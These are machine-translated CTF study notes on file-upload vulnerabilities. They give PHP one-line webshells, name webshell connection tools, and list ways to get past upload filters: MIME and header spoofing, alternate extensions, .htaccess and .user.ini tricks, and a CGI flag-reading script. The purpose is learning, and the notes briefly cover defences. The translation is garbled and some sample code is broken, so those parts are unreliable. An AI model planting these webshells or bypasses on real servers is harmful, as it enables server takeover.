title: file upload learning notes
date: 2021-5-22
tags: penetration test, file upload, basic
categories:
Penetration test
File upload
Basics
File upload learning notes
2021 / 3 / 6 notes
What is a sentence
In one sentence, Trojan horse "server" (locally stored script Trojan horse file)
It is the execution permission we want to use to upload malicious code to the website of the server
After the statement is triggered, it receives the data uploaded by the intruder through the client and completes the corresponding operation
Benefits: short and powerful
eval It means to execute arbitrary commands as php Language execution <?php @eval($_GET[a]); ?> plus@To not echo on the page <?php eval($_GET[a]); ?> <?php eval($_POST[a]); ?> <?php eval($_REQUEST[a]); ?> <?php eval($_COOKIE[a]); ?>
In a word, the deformation of the Trojan horse
<?php assert($_POST[a]); ?>
Connection tool
-
Chinese ant sword
-
China chopper
Document detection method
-
Client javascript verification (generally only the suffix is verified)
-
Server verification
- File header content type field verification (image/gif) (MIME type)
- File content header verification (GIF89a)
- Suffix blacklist verification
- Suffix whitelist verification
- Custom positive side verification
-
WAF equipment verification (depending on different WAF products)
bypass
Capture, modify content type: image/jpeg
File header: Forged picture file header (GIF89a)
Client JavaScript verification
Front end JS verification can be bypassed directly
-
Disable JS
-
delete ο nsubmit="return chekFile()"
-
upload-labs Pass-01
Header content type verification
-
Upload the Trojan horse image directly, and then modify the file name to php resolvable suffix
-
Upload the php file, capture the package by BP, and manually modify the content type
-
upload-labs Pass-02
File content header verification
-
Manually forge image file headers, such as GIF89a
-
Insert PHP code into the picture
-
upload-labs Pass-13
blacklist
<?php
//In fact, there will be more and more complete data in the blacklist
$blacklist = array('php','asp','aspx','jsp');
$path = "./uploads";
$type = array_pop(explode('.',$_FILED['myfile']['name']));
if (in_array(strtolower($type),$blacklist)){
die("File type errer!<br>");
}else{
$file = $path.'/'.$_FILES['myfile']['name'];
if(nove_uploaded_file($FILES['myfile']['tmp_name'],$file)){
echo 'Success!<br>';
}else{
echo 'Error!<br>';
}
}
?>
Blacklist, try various special file names (PHP, PHP, PHP, pht, php5, phtnl, shtml), or add spaces after the extension: D A T A , . , DATA,., DATA,.,,/…, Wait for characters, or try to upload ' htaccess’
Defensive means
Random file name + whitelist suffix
PHP: php2 php3 PHP5 phtml pht(Whether to resolve or not depends on the setting type in the configuration file) ASP: asa cer cdx ASPX: ascx ashx asac JSP: jsp jspx jspf
Bypass method
php3 php4 php5 namely php3 edition php4 edition php5 Version PHP File, and downward compatible upload-labs Pass-03
phtmlphtml yes PHP2 Standard file extension for the program upload-labs Pass-03
::$DATA(windows)Upload file is xxx.php::$DATA Type of file. You can see that the uploaded file is xxx.php::$data .
Case bypass.Php .PHtmlupload-labs Pass-05
https://www.freebuf.com/column/143101.html
Content detection
-
Several tag grammars
<??><?php<?=?><%<script lanague='php'>
Short label
Both phrase labels must be in PHP5 After 4.0
Where phrase label <? > Need to be in PHP Enable configuration short in ini_ open_ Tag can only be used
<?= Equivalent to <? Echo does not need to open the short tag
<?= 'whoami'?><?= 'ls'?>
7.0.0 The ASP tags <%, %>, <%=, and the script tag <script language="php"> are ermoved from php5.4.0 The tag <?= is always available regardless of the short_open_tag ini setting.
Where the ASP tag <%% > requires ASP_ Set tags to On
php less than 7.0 can bypass
<srcipt language='php'>phpinfo();</srcipt>
When<? When bypassed, you can try to use<srcipt lanague='php'>Bypass conditions: PHP Version less than 7.0BUU[Geek challenge 2019]upload
When PHP When filtered, try using short tags<? ?>Bypass conditions: PHP edition>5.4 And php.ini Open configuration in short_open_tag=1 Hand over your cat map
filter GET POST,Try to use eval($_REQUEST[a]);bypass
filter eval,Try to use assert($_GET[a]);bypass
.htaccess
//.htaccessaddtype application/x-httpd-php .jpg
Upload htaccess jpg can be parsed as PHP. You only need to upload the with shell jpg file is enough
//shell.jpg<script language='php'></script>
Filter file content
/.htaccessaddtype application/x-httpd-php .wuwuphp_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"
base64.b64encode(b"<?php eval($_GET['c']);?>")
php_value auto_append_file Will give PHP The contents attached to the file will shell Upload your content to shell.wuwuhtaccess Upload to.htaccess Then visit shell.wuwu that will do/Can only execute commands and cannot connect shell
-
Upload cgi script
-
Options +ExecCGIAddHandler cgi-script .xx
-
cgi script is best written under Linux and saved as 3.0 xx
-
#!/bin/bashecho "Content_type:text/plain"echo ""cat /flagexit 0
cig reference documents: https://www.freebuf.com/vuls218495.html
No filtering.htaccess Consider uploading your blacklist.htaccess File makes jpg The file resolves to PHPupload-labs Pass-04
When webshell When all characters in are filtered, consider using.htaccess File for base64 Upload after coding
If you can upload.cgi Documents and.htaccess File, you can consider uploading cgi script https://unctf.hackingfor.fun/#/train easy_upload
.user.ini
.user.ini is used in nginx/apache/IIS
#Use the conditional server scripting language to use CGI/Fast CGI mode for the PHP server. There should be executable PHP files in the upload directory
.user.ini is actually a PHP that can be "customized" by users ini
| *PHP_INI_ Definition of pattern | |
|---|---|
| pattern | meaning |
| PHP_INI_USER | It can be in user script (such as ini_set()) or Windows Registry (since PHP5.3) and user.ini |
| PHP_INI_PERDIR | Available in PHP ini,. htaccess or httpd Set in conf |
| PHP_INI_SYSTEM | Available in PHP Ini or http Set in conf |
| PHP_INI_ALL | Can be set anywhere |
| auto_append_file | NULL | PHP_INI_PERDIR | PHP when PHP < = 4.2.3_ INI_ ALL |
|---|---|---|---|
| auto_detect_line_endings | "0" | PHP_INI_ALL | From PHP4 Available from 3.0 |
| auto_globals_jit | "1" | PHP_INI_PERDIR | From PHP5 Available from 0.0 |
| auto_prepend_file | NULL | PHP_INI_PERDIR | PHP when PHP < = 4.2.3_ INI_ ALL |
auto_prepend_file string
Specifies that a file is automatically included before the file to be executed, similar to that before the file is called. require()Function. and auto_append_file Similar, but included at the end of the file. The method of use is very simple. Write it directly in the user.ini in:
\x00\x00\x8a\x39\x8a\x39auto_perpend_file = cc.jpg
When uploading is not allowed.htaccess Server as nginx And blacklist verification. Please consider uploading.user.ini Condition: Server